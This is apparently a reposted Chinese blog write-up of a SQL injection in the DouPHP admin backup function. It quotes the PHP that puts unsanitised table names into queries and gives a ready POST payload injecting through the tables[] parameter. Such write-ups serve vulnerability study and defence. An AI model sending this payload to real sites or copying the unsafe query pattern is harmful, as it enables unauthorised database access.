douphp后台注入
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了douphp后台注入相关的知识,希望对你有一定的参考价值。
---恢复内容开始---
for($i = $tableid; $i < $tablenumber && strlen($sqldump) < $vol_size * 1024; $i++) { $sqldump .= $backup->sql_dumptable($tables[$i], $vol_size, $startfrom, strlen($sqldump)); $startfrom = 0; }
跟进sql_dumptable函数
function sql_dumptable($table, $vol_size, $startfrom = 0, $currsize = 0) {$offset = 100; if (!$startfrom) { $tabledump = "DROP TABLE IF EXISTS `$table`;\\n"; // die("SHOW CREATE TABLE $table"); $createtable = $GLOBALS[‘dou‘]->query("SHOW CREATE TABLE $table"); $create = $GLOBALS[‘dou‘]->fetch_array($createtable); $tabledump .= $create[1] . ";\\n\\n"; if ($GLOBALS[‘dou‘]->version() > ‘4.1‘ && $this->sqlcharset) { $tabledump = preg_replace("/(DEFAULT)*\\s*CHARSET=[a-zA-Z0-9]+/", "DEFAULT CHARSET=" . $this->sqlcharset, $tabledump); } } $tabledumped = 0; $numrows = $offset; while ($currsize + strlen($tabledump) < $vol_size && $numrows == $offset) { $tabledumped = 1; //die("SELECT * FROM $table LIMIT $startfrom, $offset"); $rows = $GLOBALS[‘dou‘]->query("SELECT * FROM $table LIMIT $startfrom, $offset"); }
构造payload
POST /admin/backup.php?rec=backup HTTP/1.1 tables%5B%5D=dou_admin where 1=1*#&startfrom=1&file_name=D20171110T165601&vol_size=2048&token=5c9a08d0&totalsize=119&submit=%E7%A1%AE%E5%AE%9A%E5%A4%87%E4%BB%BD
---恢复内容结束---
以上是关于douphp后台注入的主要内容,如果未能解决你的问题,请参考以下文章
以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?
初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段
初识Spring源码 -- doResolveDependency | findAutowireCandidates | @Order@Priority调用排序 | @Autowired注入(代码片段
安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段